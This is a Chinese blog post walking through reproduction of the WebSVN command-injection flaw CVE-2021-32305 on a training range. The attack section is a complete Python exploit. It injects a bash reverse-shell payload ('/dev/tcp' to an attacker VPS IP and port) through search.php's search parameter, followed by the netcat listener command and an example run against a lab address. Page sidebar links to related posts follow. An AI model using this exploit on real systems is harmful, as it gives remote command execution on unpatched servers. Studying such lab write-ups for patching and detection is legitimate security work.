Websvn 命令注入 (CVE-2021-32305)

最新推荐文章于 2024-09-07 08:53:55 发布
最新推荐文章于 2024-09-07 08:53:55 发布
阅读量306 收藏
点赞数 1
分类专栏: # 命令执行 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_23003811/article/details/140602788
版权

一、漏洞概述

Websvn是一个应用软件。一个在线Subversion存储库浏览器,WebSVN 2.6.1之前版本存在安全漏洞,该漏洞允许远程攻击者通过搜索参数中的shell元字符执行任意命令。

二、影响范围

WebSVN 2.6.1之前版本

三、访问页面

四、漏洞复现

1、制作poc.py脚本,91.208.73.100改成自己的vps服务器地址。

import requests
import argparse
from urllib.parse import quote_plus
 
PAYLOAD = "/bin/bash -c 'bash -i >& /dev/tcp/91.208.73.100/7777 0>&1'"
REQUEST_PAYLOAD = '/search.php?search=";{};"'
 
parser = argparse.ArgumentParser(description='Send a payload to a websvn 2.6.0 server.')
parser.add_argument('target', type=str, help="Target URL.")
 
args = parser.parse_args()
 
if args.target.startswith("http://") or args.target.startswith("https://"):
  target = args.target
else:
  print("[!] Target should start with either http:// or https://")
  exit()
 
requests.get(target + REQUEST_PAYLOAD.format(quote_plus(PAYLOAD)))
 
print("[*] Request send. Did you get what you wanted?")

2、在vps服务器监听7777端口

 nc -lvp 7777

3、执行脚本,123.58.224.8靶场地址。

python poc.py http://123.58.224.8:32790

4、VPS服务器执行RCE

风中追风-fzzf
关注
专栏目录
利用Vulnhub复现漏洞 - Electron WebPreferences 远程命令执行漏洞(CVE-2018-15685)
JiangBuLiu的博客
07-03 1105
Electron WebPreferences 远程命令执行漏洞(CVE-2018-15685)Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现 Vulnhub官方复现教程 https://github.com/vulhub/vulhub/blob/master/electron/CVE-2018-15685/README.zh-cn.md 漏洞原理 Electron是由Github开发...
安全攻防实验-2】VulFocus搭建
qq_26579613的博客
02-07 1088
建议内网搭建
Websvn的安装
weixin_34242658的博客
11-09 642
Websvn的安装 一.安装MSYS(版本:1.0.10)说明;websvn做版本之间代码 比较时需要调用diff命令(linux下),但是windows下没有该命令,所以要依靠MSYS提供diff命令的运行环境。官方网站:http://www.mingw.org/ 二.安装websvn官方网站:http://websvn.tigris.org/版本:2.0将include目录 下distco...
漏洞预警:CVE-2021-32305 WebSVN 2.6.0 RCE
热门推荐
weixin_43526443的博客
12-06 6万+
——D&X安全实验室 目录 Part1 漏洞描述 Part2 危害等级 Part3 漏洞影响 Part4 漏洞分析及验证 源码分析 Part5 修复建议 Part1 漏洞描述 WebSVN是一个基于Web的Subversion Repository浏览器,可以查看文件或文件夹的日志,查看文件的变化列表等。其search.php?search= 参数下过滤不严谨导致RCE。 WebSVN官网地址:https://websvnphp.github.i...
WebSVN安装与配置指南
最新发布
gitblog_00530的博客
09-07 373
WebSVN安装与配置指南 websvnFork from WebSVN项目地址:https://gitcode.com/gh_mirrors/we/websvn 1. 项目目录结构及介绍 WebSVN作为一个基于PHP的在线Subversion仓库浏览器,其目录结构合理组织以支持便捷的开发与部署。以下是一般性的结构概述: root include 这个目录包含了配置文件(如config....
svn 管理工具(web版)
06-09
websvn管理工具,可以进行svn库管理,svn用户权限权限分配,资源权限分配
[春秋云镜]CVE-2021-32305
niubi707的博客
12-03 6533
春秋云镜CVE-2021-32305WebSVN是一个基于Web的Subversion Repository浏览器,可以查看文件或文件夹的日志,查看文件的变化列表等。其search.php?search= 参数下过滤不严谨导致RCE。
春秋云镜 CVE-2021-32305
qq_22002773的博客
08-02 325
春秋云镜 CVE-2021-32305
subversion mysql_Centos 5.3 Nginx+php+mysql配置 独立的 Subversion (SVN)服务器
weixin_39869432的博客
01-30 95
subversion(以下简称svn)是近年来崛起的版本管理工具,是cvs的接班人。svn服务器有2种运行方式:1. 独立服务器2. 借助apache。二种方式各有利弊,可以根据自己的需要进行配置,我不需要Http进行访问,只需要客户端可以Commit & update 就可以,所以我选择了第一种方式-独立的SVN服务器。svn存储版本数据也有2种方式:1. BDB2. FSFS。因为BD...
WebSVN 2.3.3
03-21 134
WebSVN 2.3.3 WebSVN 2.3.3 (released June 27th, 2011): Download as tar.gz or zip file.Check the requirements before trying to use Web...
websvn 2.3.3源码包
01-12
1. 解压`websvn-2.3.3`压缩包到Web服务器的文档根目录。 2. 配置`config.php`,指定SVN服务器的位置、数据库连接信息以及其他设置。 3. 创建数据库并导入Websvn提供的SQL脚本,如果需要的话。 4. 访问Web服务器上的...
USVN WEB管理SVN
09-06
USVN 是一种免费并开源的WEB管理SVN管理工具,使用Linux+mysql+php+svn的管理方式,可以实现SVN用户管理和资源管理功能.
websvn2.2 for linux
04-15
Websvn是一个基于Web的Subversion(SVN)版本控制系统客户端,它允许用户通过Web浏览器浏览、查看和管理SVN仓库。"Websvn 2.2 for Linux"是这个工具的一个特定版本,专为Linux操作系统设计。在这个版本中,用户可以...
svn 常用命令集合
10-15
客户端工具可以是基于Web的,如WebSVN,也可以是需要安装在本地的软件,比如TortoiseSVN。这些工具都支持免费的开源软件。 下面是Subversion的一些基本操作命令,以及它们的功能和使用方法: 1. checkout:从版本...
基于websvn简易管理系统
xiangzi1113的专栏
03-17 7999
这篇博客其实算是记录自己的开发团体关于代码管理方式的一个变迁,分为两部分,一是这篇基于SVN的流程,二是基于GIT的流程。 博客内容并不精彩,纯粹做个记录,当新成员的学习材料。 ====================================================== svn是大家比较常用的版本管理系统,一个很常见的开发流程如下图 这样的流程对小团队开发来说简
websvn mysql_浏览器访问svn
weixin_42350865的博客
02-02 326
你看到的这个文章来自于http://www.cnblogs.com/ayanmw基本的安装包有: subversion /httpd/ svn的httpd的mod_dav_svnmod_authz_svn 两个模块.(yum install mod_dav_svn subversion httpd )svn的服务形式应该是有两种: 1 通过svnserve建立的 通过svn://ip:port ...
svn Web管理svnadmin
weixin_33709364的博客
04-19 244
官方:http://code.google.com/p/jsvnadmin/ 下载的软件包含了用户手册,相关的使用方法写得很明白。 官方介绍是使用tomcat ,由于我还没学会安装tomcat,所以就使用了resin。 一、安装所需软件包 1.通过yum安装svn、http、mysql yum -y install subversion subversion-d...
Java Web-SVN(四)
Ydecube的博客
01-18 288
1、回顾 事务管理 整合Junit 整合Web 整合 2、SVN 版本控制 版本控制(Revision Control):是维护工程蓝图的标准做法,能追踪工程蓝图从诞生一直到定案的过程。是一种记录若干文件内容变化,以便将来查阅特定版本修订情况的系统。 版本控制软件 CVS(Concurrent Versions System)代表协作版本系统或者并发版本系统,是一种版本控制系统,方便软件的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值